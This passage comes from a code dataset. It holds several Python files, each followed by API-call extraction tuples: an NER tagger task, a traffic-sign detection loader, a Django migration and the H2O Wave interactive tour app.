propagate_map_exceptions=propagate_map_exceptions,
on_load_failure_callback=on_load_failure_callback,
verify_requirements=verify_requirements,
)
def _load_one_plugin(self, ep, invoke_on_load, invoke_args, invoke_kwds,
verify_requirements):
ext = super(EnabledExtensionManager, self)._load_one_plugin(
ep, invoke_on_load, invoke_args, invoke_kwds,
verify_requirements,
)
if ext and not self.check_func(ext):
LOG.debug('ignoring extension %r', ep.name)
return None
return ext
| [
"logging.getLogger"
] | [((619, 646), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (636, 646), False, 'import logging\n')] |
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2020-12-03 14:35
import logging
from typing import Union, List, Dict, Any, Iterable, Callable, Set
import torch
from hanlp_trie import DictInterface
from torch.utils.data import DataLoader
from elit.common.dataset import SamplerBuilder, PadSequenceDataLoader
from elit.common.transform import VocabDict
from elit.components.mtl.tasks import Task
from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer
from elit.layers.crf.crf import CRF
from elit.layers.scalar_mix import ScalarMixWithDropoutBuilder
from elit.metrics.metric import Metric
from elit.metrics.mtl import MetricDict
from hanlp_common.util import merge_locals_kwargs
class LinearCRFDecoder(torch.nn.Module):
def __init__(self,
hidden_size,
num_labels,
secondary_encoder=None,
crf=False) -> None:
super().__init__()
self.secondary_encoder = secondary_encoder
self.classifier = torch.nn.Linear(hidden_size, num_labels)
self.crf = CRF(num_labels) if crf else None
def forward(self, contextualized_embeddings: torch.FloatTensor, batch: Dict[str, torch.Tensor], mask=None):
if self.secondary_encoder:
contextualized_embeddings = self.secondary_encoder(contextualized_embeddings, mask=mask)
return self.classifier(contextualized_embeddings)
class TaggingNamedEntityRecognition(Task, TransformerNamedEntityRecognizer):
def __init__(self,
trn: str = None,
dev: str = None,
tst: str = None,
sampler_builder: SamplerBuilder = None,
dependencies: str = None,
scalar_mix: ScalarMixWithDropoutBuilder = None,
use_raw_hidden_states=False,
lr=1e-3,
separate_optimizer=False,
max_seq_len=None,
sent_delimiter=None,
char_level=False,
hard_constraint=False,
tagging_scheme=None,
crf=False,
delimiter_in_entity=None,
merge_types: List[str] = None,
secondary_encoder=None,
token_key='token',
dict_whitelist: Union[DictInterface, Union[Dict[str, Any], Set[str]]] = None,
dict_blacklist: Union[DictInterface, Union[Dict[str, Any], Set[str]]] = None,
**kwargs) -> None:
r"""A simple tagger using a linear layer with an optional CRF (:cite:`lafferty2001conditional`) layer for
NER task. It can utilize whitelist gazetteers which is dict mapping from entity name to entity type.
During decoding, it performs longest-prefix-matching of these words to override the prediction from
underlining statistical model. It also uses a blacklist to mask out mis-predicted entities.
.. Note:: For algorithm beginners, longest-prefix-matching is the prerequisite to understand what dictionary can
do and what it can't do. The tutorial in `this book <http://nlp.hankcs.com/book.php>`_ can be very helpful.
Args:
trn: Path to training set.
dev: Path to dev set.
tst: Path to test set.
sampler_builder: A builder which builds a sampler.
dependencies: Its dependencies on other tasks.
scalar_mix: A builder which builds a `ScalarMixWithDropout` object.
use_raw_hidden_states: Whether to use raw hidden states from transformer without any pooling.
lr: Learning rate for this task.
separate_optimizer: Use customized separate optimizer for this task.
max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible.
sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can
be split here.
char_level: Whether the sequence length is measured at char level, which is never the case for
lemmatization.
hard_constraint: Whether to enforce hard length constraint on sentences. If there is no ``sent_delimiter``
in a sentence, it will be split at a token anyway.
token_key: The key to tokens in dataset. This should always be set to ``token`` in MTL.
crf: ``True`` to enable CRF (:cite:`lafferty2001conditional`).
delimiter_in_entity: The delimiter between tokens in entity, which is used to rebuild entity by joining
tokens during decoding.
merge_types: The types of consecutive entities to be merged.
secondary_encoder: An optional secondary encoder to provide enhanced representation by taking the hidden
states from the main encoder as input.
token_key: The key to tokens in dataset. This should always be set to ``token`` in MTL.
dict_whitelist: A :class:`dict` or a :class:`~hanlp_trie.dictionary.DictInterface` of gazetteers to be
included into the final results.
dict_blacklist: A :class:`set` or a :class:`~hanlp_trie.dictionary.DictInterface` of badcases to be
excluded from the final results.
**kwargs:
"""
super().__init__(**merge_locals_kwargs(locals(), kwargs))
self.vocabs = VocabDict()
self.secondary_encoder = secondary_encoder
self.dict_whitelist = dict_whitelist
self.dict_blacklist = dict_blacklist
def build_dataloader(self,
data,
transform: Callable = None,
training=False,
device=None,
logger: logging.Logger = None,
cache=False,
gradient_accumulation=1,
**kwargs) -> DataLoader:
args = dict((k, self.config[k]) for k in
['delimiter', 'max_seq_len', 'sent_delimiter', 'char_level', 'hard_constraint'] if k in self.config)
dataset = self.build_dataset(data, cache=cache, transform=transform, **args)
dataset.append_transform(self.vocabs)
if self.vocabs.mutable:
self.build_vocabs(dataset, logger)
return PadSequenceDataLoader(
batch_sampler=self.sampler_builder.build(
self.compute_lens(data, dataset, 'token_input_ids', 'token'),
shuffle=training, gradient_accumulation=gradient_accumulation),
device=device,
dataset=dataset)
def compute_loss(self,
batch: Dict[str, Any],
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
criterion) -> Union[torch.FloatTensor, Dict[str, torch.FloatTensor]]:
return TransformerNamedEntityRecognizer.compute_loss(self, criterion, output, batch['tag_id'], batch['mask'])
def decode_output(self,
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
mask: torch.BoolTensor,
batch: Dict[str, Any],
decoder,
**kwargs) -> Union[Dict[str, Any], Any]:
return TransformerNamedEntityRecognizer.decode_output(self, output, batch['mask'], batch, decoder)
def update_metrics(self,
batch: Dict[str, Any],
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
prediction: Dict[str, Any],
metric: Union[MetricDict, Metric]):
return TransformerNamedEntityRecognizer.update_metrics(self, metric, output, batch['tag_id'], batch['mask'],
batch, prediction)
def build_model(self, encoder_size, training=True, **kwargs) -> torch.nn.Module:
return LinearCRFDecoder(encoder_size, len(self.vocabs['tag']), self.secondary_encoder, self.config.crf)
def build_metric(self, **kwargs):
return TransformerNamedEntityRecognizer.build_metric(self, **kwargs)
def input_is_flat(self, data) -> bool:
return TransformerNamedEntityRecognizer.input_is_flat(self, data)
def prediction_to_result(self, prediction: Dict[str, Any], batch: Dict[str, Any]) -> Union[List, Dict]:
return TransformerNamedEntityRecognizer.prediction_to_human(self, prediction, self.vocabs['tag'].idx_to_token,
batch)
| [
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.update_metrics",
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.prediction_to_human",
"elit.layers.crf.crf.CRF",
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.compute_loss",
"elit.components.... | [((1012, 1052), 'torch.nn.Linear', 'torch.nn.Linear', (['hidden_size', 'num_labels'], {}), '(hidden_size, num_labels)\n', (1027, 1052), False, 'import torch\n'), ((5437, 5448), 'elit.common.transform.VocabDict', 'VocabDict', ([], {}), '()\n', (5446, 5448), False, 'from elit.common.transform import VocabDict\n'), ((6947, 7053), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.compute_loss', 'TransformerNamedEntityRecognizer.compute_loss', (['self', 'criterion', 'output', "batch['tag_id']", "batch['mask']"], {}), "(self, criterion, output,\n batch['tag_id'], batch['mask'])\n", (6992, 7053), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((7384, 7479), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.decode_output', 'TransformerNamedEntityRecognizer.decode_output', (['self', 'output', "batch['mask']", 'batch', 'decoder'], {}), "(self, output, batch['mask'],\n batch, decoder)\n", (7430, 7479), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((7783, 7908), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.update_metrics', 'TransformerNamedEntityRecognizer.update_metrics', (['self', 'metric', 'output', "batch['tag_id']", "batch['mask']", 'batch', 'prediction'], {}), "(self, metric, output, batch\n ['tag_id'], batch['mask'], batch, prediction)\n", (7830, 7908), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8219, 8280), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.build_metric', 'TransformerNamedEntityRecognizer.build_metric', (['self'], {}), '(self, **kwargs)\n', (8264, 8280), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8340, 8398), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.input_is_flat', 'TransformerNamedEntityRecognizer.input_is_flat', (['self', 'data'], {}), '(self, data)\n', (8386, 8398), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8523, 8638), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.prediction_to_human', 'TransformerNamedEntityRecognizer.prediction_to_human', (['self', 'prediction', "self.vocabs['tag'].idx_to_token", 'batch'], {}), "(self, prediction, self\n .vocabs['tag'].idx_to_token, batch)\n", (8575, 8638), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((1072, 1087), 'elit.layers.crf.crf.CRF', 'CRF', (['num_labels'], {}), '(num_labels)\n', (1075, 1087), False, 'from elit.layers.crf.crf import CRF\n')] |
import logging
import math
from datetime import datetime
from pathlib import Path
from typing import Set
from pandas import DataFrame
from shapely.geometry import Point
from shapely.strtree import STRtree
import utility
from model import Position
DEFAULT_CLASSES = {
'b11', 'c61', 'c51', 'c55:50',
'c55:60', 'c55:70', 'c56:60', 'c56:70',
'c62', 'd11.3', 'd15.2', 'd15.3',
'e23', 'e33.1', 'e55', 'e56',
'n42.2', 'n42.3'
}
DATA_PATH = Path(__file__).parents[1].joinpath('data')
AALBORG_DATA_PATH = DATA_PATH.joinpath('aalborg')
HP_TUNING_DATA_PATH = DATA_PATH.joinpath('hp_tuning')
logger = logging.getLogger(Path(__file__).stem)
def map_aal_data(position: Position):
time_format = '%Y-%m-%dT%H:%M:%S'
return {
'id': position.properties['object_no'],
'geom': Point(position),
'trip_id': position.properties['trip_no'],
'classifier': position.properties['label_name'],
'speed': position.properties['speed'],
'heading': math.radians(position.properties['obj_heading']),
'score': position.properties['score'],
'distance': position.properties['distance_to_object'],
'trip_start_time': datetime.strptime(position.properties['trip_start_time'], time_format),
'trip_stop_time': datetime.strptime(position.properties['trip_stop_time'], time_format),
'image_capture_time': datetime.strptime(position.properties['image_capture_time'], time_format)
}
def load_gomap_detections(filepath: str, classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame:
detections = utility.load_geoJson(filepath, 'epsg:4326', 'epsg:3044')
df = DataFrame(map(map_aal_data, detections))
logger.info('Loaded %d detections', len(df))
# Cleansing
df = df[df['classifier'].isin(classes)]
logger.info('%d detections remains after applying class filter', len(df))
logger.debug(df.groupby('classifier')['classifier'].agg('count'))
df = df[df['score'] >= min_score]
logger.info('%d detections remains after applying min_score >= %f filter', len(df), min_score)
df = df[df['distance'] <= max_distance]
logger.info('%d detections remains after applying max_distance <= %f meter filter', len(df), max_distance)
logger.debug(df.groupby('classifier')['classifier'].agg('count'))
return df
def load_aal_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(AALBORG_DATA_PATH.joinpath('traffic_sign_detections.geojson'), classes, min_score, max_distance)
def load_gomap_train_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('training.geojson'), classes, min_score, max_distance)
def load_gomap_validation_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('validation.geojson'), classes, min_score, max_distance)
def load_gomap_test_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('testing.geojson'), classes, min_score, max_distance)
def _map_aal_truth(position: Position):
position.properties['heading'] = math.radians(position.properties['map_heading'])
return position
def load_gomap_truths(filepath: str, classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
def normalize_label_name(position: Position) -> Position:
label = position.properties['label_name']
if label in {'c55', 'c56'}:
position.properties['label_name'] = f'{label}:{position.properties["sign_text"]}'
return position
truths = utility.load_geoJson(filepath, 'epsg:4326', 'epsg:3044')
truths = list(truths)
logger.info('Loaded %d truths', len(truths))
truths = map(normalize_label_name, truths)
truths = [x for x in truths if x.properties['label_name'] in classes]
logger.info('%d truths remains after applying class filter', len(truths))
truths = map(_map_aal_truth, truths)
return STRtree(truths)
def load_aal_truths(classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
return load_gomap_truths(AALBORG_DATA_PATH.joinpath('traffic_sign_ground_truth.geojson'), classes)
def load_gomap_test_truths(classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
return load_gomap_truths(HP_TUNING_DATA_PATH.joinpath('testing_truth.geojson'), classes)
| [
"pathlib.Path",
"datetime.datetime.strptime",
"shapely.strtree.STRtree",
"shapely.geometry.Point",
"utility.load_geoJson",
"math.radians"
] | [((1720, 1776), 'utility.load_geoJson', 'utility.load_geoJson', (['filepath', '"""epsg:4326"""', '"""epsg:3044"""'], {}), "(filepath, 'epsg:4326', 'epsg:3044')\n", (1740, 1776), False, 'import utility\n'), ((3527, 3575), 'math.radians', 'math.radians', (["position.properties['map_heading']"], {}), "(position.properties['map_heading'])\n", (3539, 3575), False, 'import math\n'), ((3975, 4031), 'utility.load_geoJson', 'utility.load_geoJson', (['filepath', '"""epsg:4326"""', '"""epsg:3044"""'], {}), "(filepath, 'epsg:4326', 'epsg:3044')\n", (3995, 4031), False, 'import utility\n'), ((4371, 4386), 'shapely.strtree.STRtree', 'STRtree', (['truths'], {}), '(truths)\n', (4378, 4386), False, 'from shapely.strtree import STRtree\n'), ((677, 691), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (681, 691), False, 'from pathlib import Path\n'), ((866, 881), 'shapely.geometry.Point', 'Point', (['position'], {}), '(position)\n', (871, 881), False, 'from shapely.geometry import Point\n'), ((1077, 1125), 'math.radians', 'math.radians', (["position.properties['obj_heading']"], {}), "(position.properties['obj_heading'])\n", (1089, 1125), False, 'import math\n'), ((1279, 1349), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['trip_start_time']", 'time_format'], {}), "(position.properties['trip_start_time'], time_format)\n", (1296, 1349), False, 'from datetime import datetime\n'), ((1382, 1451), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['trip_stop_time']", 'time_format'], {}), "(position.properties['trip_stop_time'], time_format)\n", (1399, 1451), False, 'from datetime import datetime\n'), ((1488, 1561), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['image_capture_time']", 'time_format'], {}), "(position.properties['image_capture_time'], time_format)\n", (1505, 1561), False, 'from datetime import datetime\n'), ((498, 512), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (502, 512), False, 'from pathlib import Path\n')] |
# Generated by Django 3.0.2 on 2020-01-24 02:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('restaurantes', '0009_auto_20200123_2310'),
]
operations = [
migrations.RemoveField(
model_name='enderecos',
name='restaurante',
),
migrations.AddField(
model_name='restaurantes',
name='enderecos',
field=models.ForeignKey(blank=True, default=1, on_delete=django.db.models.deletion.DO_NOTHING, to='restaurantes.Enderecos'),
preserve_default=False,
),
]
| [
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] | [((273, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""enderecos"""', 'name': '"""restaurante"""'}), "(model_name='enderecos', name='restaurante')\n", (295, 339), False, 'from django.db import migrations, models\n'), ((492, 614), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'default': '(1)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'to': '"""restaurantes.Enderecos"""'}), "(blank=True, default=1, on_delete=django.db.models.\n deletion.DO_NOTHING, to='restaurantes.Enderecos')\n", (509, 614), False, 'from django.db import migrations, models\n')] |
import collections
import os
import os.path
import re
import subprocess
import sys
from urllib.parse import urlparse
from typing import List, Optional, Dict, Tuple
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from h2o_wave import main, app, Q, ui
py_lexer = get_lexer_by_name('python')
html_formatter = HtmlFormatter(full=True, style='xcode')
example_dir = os.path.dirname(os.path.realpath(__file__))
_base_url = os.environ.get('H2O_WAVE_BASE_URL', '/')
_app_address = urlparse(os.environ.get(f'H2O_WAVE_APP_ADDRESS', 'http://127.0.0.1:8000'))
_app_host, _app_port = _app_address.hostname, '10102'
default_example_name = 'hello_world'
class Example:
def __init__(self, filename: str, title: str, description: str, source: str):
self.name = os.path.splitext(filename)[0]
self.filename = filename
self.title = title
self.description = description
self.source = source
self.code = highlight(source, py_lexer, html_formatter)
self.previous_example: Optional[Example] = None
self.next_example: Optional[Example] = None
self.process: Optional[subprocess.Popen] = None
self.is_app = source.find('@app(') > 0
async def start(self):
env = dict(H2O_WAVE_BASE_URL=_base_url)
# The environment passed into Popen must include SYSTEMROOT, otherwise Popen will fail when called
# inside python during initialization if %PATH% is configured, but without %SYSTEMROOT%.
if sys.platform.lower().startswith('win'):
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
if self.is_app:
self.process = subprocess.Popen([
sys.executable, '-m', 'uvicorn',
'--host', '0.0.0.0',
'--port', _app_port,
f'examples.{self.name}:main',
], env=dict(H2O_WAVE_EXTERNAL_ADDRESS=f'http://{_app_host}:{_app_port}', PATH=os.environ['PATH'], **env))
else:
self.process = subprocess.Popen([sys.executable, os.path.join(example_dir, self.filename)], env=env)
async def stop(self):
if self.process and self.process.returncode is None:
self.process.terminate()
self.process.wait()
active_example: Optional[Example] = None
def read_lines(p: str) -> List[str]:
with open(p, encoding='utf-8') as f:
return f.readlines()
def read_file(p: str) -> str:
with open(p, encoding='utf-8') as f:
return f.read()
def strip_comment(line: str) -> str:
"""Returns the content of a line without '#' and ' ' characters
remove leading '#', but preserve '#' that is part of a tag
example:
>>> '# #hello '.strip('#').strip()
'#hello'
"""
return line.strip('#').strip()
def parse_tags(description: str) -> Tuple[str, List[str]]:
"""Creates tags from description.
Accepts a description containing tags and returns a (new_description, tags) tuple.
The convention for tags:
1. Any valid twitter hashtag
For example, accept a description in any of the following forms
1. Use a checklist to group a set of related checkboxes. #form #checkbox #checklist
2. Use a checklist to group a set of related checkboxes.
#form #checkbox #checklist
3. Use a #checklist to group a set of related checkboxes.
#form #checkbox
and return
('Use a checklist to group a set of related checkboxes.', ['checkbox', 'checklist', 'form']). The list of tags will
be sorted and all tags will be converted to lowercase.
Args:
description: Complete description of an example.
Returns:
A tuple of new_description and a sorted list of tags. new_description is created by removing the '#' characters
from the description.
"""
hashtag_regex_pattern = r"(\s+)#(\w*[a-zA-Z]+\w*)\b"
pattern = re.compile(hashtag_regex_pattern)
matches = pattern.findall(' ' + description)
# Retrieve tags from the matches
tags = sorted(list(set([x[-1].lower() for x in matches])))
# Remove the '#' before the tags in description
new_d = pattern.sub(r'\1\2', ' ' + description)
# Remove the last line in description if it has only tags
*lines, last_line = new_d.strip().splitlines()
last_line_has_tags_only = len(last_line.strip()) > 1 and all([x.strip().lower() in tags for x in last_line.split()])
if last_line_has_tags_only:
# Return all lines except the last line
return '\n'.join(lines), tags
# Remove the last sentence if it has only tags
*sentences, last_sentence = last_line.split('. ')
last_sentence_has_tags_only = len(last_sentence.strip()) > 1 and all(
[x.strip().lower() in tags for x in last_sentence.split()])
if last_sentence_has_tags_only:
# Return all lines and all sentences in the last line except the last sentence
lines.extend(sentences)
return '\n'.join(lines) + '.', tags
# Return the complete description
lines.append(last_line)
return '\n'.join(lines), tags
def load_example(filename: str) -> Example:
contents = read_file(os.path.join(example_dir, filename))
parts = contents.split('---', maxsplit=1)
header, source = parts[0].strip().splitlines(), parts[1].strip()
title, description = strip_comment(header[0]), [strip_comment(x) for x in header[1:]]
new_description, _ = parse_tags('\n'.join(description))
return Example(filename, title, new_description, source)
def load_examples(filenames: List[str]) -> Dict[str, Example]:
examples = collections.OrderedDict()
for filename in filenames:
example = load_example(filename)
examples[example.name] = example
example_list = [e for e in examples.values()]
k = len(example_list) - 1
for i, e in enumerate(example_list):
if i > 0:
e.previous_example = example_list[i - 1]
if i < k:
e.next_example = example_list[i + 1]
return examples
app_title = 'H2O Wave Tour'
async def setup_page(q: Q):
q.page['meta'] = ui.meta_card(box='', title=app_title, layouts=[
ui.layout(breakpoint='xs', zones=[
ui.zone('header'),
ui.zone('blurb'),
ui.zone('main', size='calc(100vh - 140px)', direction=ui.ZoneDirection.ROW, zones=[
ui.zone('code'),
ui.zone('preview')
])
])
])
q.page['header'] = ui.header_card(
box='header',
title=app_title,
subtitle=f'{len(catalog)} Interactive Examples',
image='https://wave.h2o.ai/img/h2o-logo.svg',
items=[
ui.links(inline=True, items=[
ui.link(label='Wave docs', path='https://wave.h2o.ai/docs/getting-started', target='_blank'),
ui.link(label='Discussions', path='https://github.com/h2oai/wave/discussions', target='_blank'),
ui.link(label='Blog', path='https://wave.h2o.ai/blog', target='_blank'),
ui.link(label='Hybrid Cloud', path='https://www.h2o.ai/hybrid-cloud/', target='_blank'),
ui.link(label='H2O', path='https://www.h2o.ai/', target='_blank'),
])
]
)
q.page['blurb'] = ui.section_card(box='blurb', title='', subtitle='', items=[])
q.page['code'] = ui.frame_card(box='code', title='', content='')
q.page['preview'] = ui.frame_card(box='preview', title='Preview', path=f'{_base_url}demo')
await q.page.save()
def make_blurb(q: Q, example: Example):
blurb_card = q.page['blurb']
blurb_card.title = example.title
blurb_card.subtitle = example.description
# HACK: Recreate dropdown every time (by dynamic name) to control value (needed for next / prev btn functionality).
items = [ui.dropdown(name=q.args['#'] or default_example_name, width='300px', value=example.name, trigger=True,
choices=[ui.choice(name=e.name, label=e.title) for e in catalog.values()])]
if example.previous_example:
items.append(ui.button(name=f'#{example.previous_example.name}', label='Previous'))
if example.next_example:
items.append(ui.button(name=f'#{example.next_example.name}', label='Next', primary=True))
blurb_card.items = items
async def show_example(q: Q, example: Example):
# Clear demo page
demo_page = q.site['/demo']
demo_page.drop()
await demo_page.save()
# Stop active example, if any.
global active_example
if active_example:
await active_example.stop()
# Start new example
active_example = example
await active_example.start()
# Update example blurb
make_blurb(q, active_example)
# Update code display
code_card = q.page['code']
code_card.title = active_example.filename
code_card.content = active_example.code
preview_card = q.page['preview']
# Update preview title
preview_card.title = f'Preview of {active_example.filename}'
# HACK
# The ?e= appended to the path forces the frame to reload.
# The url param is not actually used.
preview_card.path = f'{_base_url}demo?e={active_example.name}'
await q.page.save()
@app('/tour')
async def serve(q: Q):
if not q.client.initialized:
q.client.initialized = True
await setup_page(q)
search = q.args[q.args['#'] or default_example_name]
if search:
q.page['meta'] = ui.meta_card(box='', redirect=f'#{search}')
await show_example(q, catalog[search or q.args['#'] or default_example_name])
example_filenames = [line.strip() for line in read_lines(os.path.join(example_dir, 'tour.conf')) if
not line.strip().startswith('#')]
catalog = load_examples(example_filenames)
print('----------------------------------------')
print(' Welcome to the H2O Wave Interactive Tour!')
print('')
print(' Go to http://localhost:10101/tour')
print('----------------------------------------')
| [
"collections.OrderedDict",
"re.compile",
"pygments.highlight",
"h2o_wave.ui.meta_card",
"os.environ.get",
"h2o_wave.ui.section_card",
"os.path.join",
"h2o_wave.ui.frame_card",
"os.path.realpath",
"os.path.splitext",
"h2o_wave.ui.button",
"h2o_wave.app",
"h2o_wave.ui.choice",
"pygments.lexe... | [((344, 371), 'pygments.lexers.get_lexer_by_name', 'get_lexer_by_name', (['"""python"""'], {}), "('python')\n", (361, 371), False, 'from pygments.lexers import get_lexer_by_name\n'), ((389, 428), 'pygments.formatters.html.HtmlFormatter', 'HtmlFormatter', ([], {'full': '(True)', 'style': '"""xcode"""'}), "(full=True, style='xcode')\n", (402, 428), False, 'from pygments.formatters.html import HtmlFormatter\n'), ((500, 540), 'os.environ.get', 'os.environ.get', (['"""H2O_WAVE_BASE_URL"""', '"""/"""'], {}), "('H2O_WAVE_BASE_URL', '/')\n", (514, 540), False, 'import os\n'), ((9225, 9237), 'h2o_wave.app', 'app', (['"""/tour"""'], {}), "('/tour')\n", (9228, 9237), False, 'from h2o_wave import main, app, Q, ui\n'), ((459, 485), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (475, 485), False, 'import os\n'), ((565, 629), 'os.environ.get', 'os.environ.get', (['f"""H2O_WAVE_APP_ADDRESS"""', '"""http://127.0.0.1:8000"""'], {}), "(f'H2O_WAVE_APP_ADDRESS', 'http://127.0.0.1:8000')\n", (579, 629), False, 'import os\n'), ((3926, 3959), 're.compile', 're.compile', (['hashtag_regex_pattern'], {}), '(hashtag_regex_pattern)\n', (3936, 3959), False, 'import re\n'), ((5630, 5655), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (5653, 5655), False, 'import collections\n'), ((7287, 7348), 'h2o_wave.ui.section_card', 'ui.section_card', ([], {'box': '"""blurb"""', 'title': '""""""', 'subtitle': '""""""', 'items': '[]'}), "(box='blurb', title='', subtitle='', items=[])\n", (7302, 7348), False, 'from h2o_wave import main, app, Q, ui\n'), ((7370, 7417), 'h2o_wave.ui.frame_card', 'ui.frame_card', ([], {'box': '"""code"""', 'title': '""""""', 'content': '""""""'}), "(box='code', title='', content='')\n", (7383, 7417), False, 'from h2o_wave import main, app, Q, ui\n'), ((7442, 7512), 'h2o_wave.ui.frame_card', 'ui.frame_card', ([], {'box': '"""preview"""', 'title': '"""Preview"""', 'path': 'f"""{_base_url}demo"""'}), "(box='preview', title='Preview', path=f'{_base_url}demo')\n", (7455, 7512), False, 'from h2o_wave import main, app, Q, ui\n'), ((1019, 1062), 'pygments.highlight', 'highlight', (['source', 'py_lexer', 'html_formatter'], {}), '(source, py_lexer, html_formatter)\n', (1028, 1062), False, 'from pygments import highlight\n'), ((5187, 5222), 'os.path.join', 'os.path.join', (['example_dir', 'filename'], {}), '(example_dir, filename)\n', (5199, 5222), False, 'import os\n'), ((9456, 9499), 'h2o_wave.ui.meta_card', 'ui.meta_card', ([], {'box': '""""""', 'redirect': 'f"""#{search}"""'}), "(box='', redirect=f'#{search}')\n", (9468, 9499), False, 'from h2o_wave import main, app, Q, ui\n'), ((841, 867), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (857, 867), False, 'import os\n'), ((8087, 8156), 'h2o_wave.ui.button', 'ui.button', ([], {'name': 'f"""#{example.previous_example.name}"""', 'label': '"""Previous"""'}), "(name=f'#{example.previous_example.name}', label='Previous')\n", (8096, 8156), False, 'from h2o_wave import main, app, Q, ui\n'), ((8208, 8283), 'h2o_wave.ui.button', 'ui.button', ([], {'name': 'f"""#{example.next_example.name}"""', 'label': '"""Next"""', 'primary': '(True)'}), "(name=f'#{example.next_example.name}', label='Next', primary=True)\n", (8217, 8283), False, 'from h2o_wave import main, app, Q, ui\n'), ((9642, 9680), 'os.path.join', 'os.path.join', (['example_dir', '"""tour.conf"""'], {}), "(example_dir, 'tour.conf')\n", (9654, 9680), False, 'import os\n'), ((1565, 1585), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\n', (1583, 1585), False, 'import sys\n'), ((2094, 2134), 'os.path.join', 'os.path.join', (['example_dir', 'self.filename'], {}), '(example_dir, self.filename)\n', (2106, 2134), False, 'import os\n'), ((7966, 8003), 'h2o_wave.ui.choice', 'ui.choice', ([], {'name': 'e.name', 'label': 'e.title'}), '(name=e.name, label=e.title)\n', (7975, 8003), False, 'from h2o_wave import main, app, Q, ui\n'), ((6232, 6249), 'h2o_wave.ui.zone', 'ui.zone', (['"""header"""'], {}), "('header')\n", (6239, 6249), False, 'from h2o_wave import main, app, Q, ui\n'), ((6263, 6279), 'h2o_wave.ui.zone', 'ui.zone', (['"""blurb"""'], {}), "('blurb')\n", (6270, 6279), False, 'from h2o_wave import main, app, Q, ui\n'), ((6750, 6846), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Wave docs"""', 'path': '"""https://wave.h2o.ai/docs/getting-started"""', 'target': '"""_blank"""'}), "(label='Wave docs', path='https://wave.h2o.ai/docs/getting-started',\n target='_blank')\n", (6757, 6846), False, 'from h2o_wave import main, app, Q, ui\n'), ((6860, 6960), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Discussions"""', 'path': '"""https://github.com/h2oai/wave/discussions"""', 'target': '"""_blank"""'}), "(label='Discussions', path=\n 'https://github.com/h2oai/wave/discussions', target='_blank')\n", (6867, 6960), False, 'from h2o_wave import main, app, Q, ui\n'), ((6973, 7044), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Blog"""', 'path': '"""https://wave.h2o.ai/blog"""', 'target': '"""_blank"""'}), "(label='Blog', path='https://wave.h2o.ai/blog', target='_blank')\n", (6980, 7044), False, 'from h2o_wave import main, app, Q, ui\n'), ((7062, 7153), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Hybrid Cloud"""', 'path': '"""https://www.h2o.ai/hybrid-cloud/"""', 'target': '"""_blank"""'}), "(label='Hybrid Cloud', path='https://www.h2o.ai/hybrid-cloud/',\n target='_blank')\n", (7069, 7153), False, 'from h2o_wave import main, app, Q, ui\n'), ((7167, 7232), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""H2O"""', 'path': '"""https://www.h2o.ai/"""', 'target': '"""_blank"""'}), "(label='H2O', path='https://www.h2o.ai/', 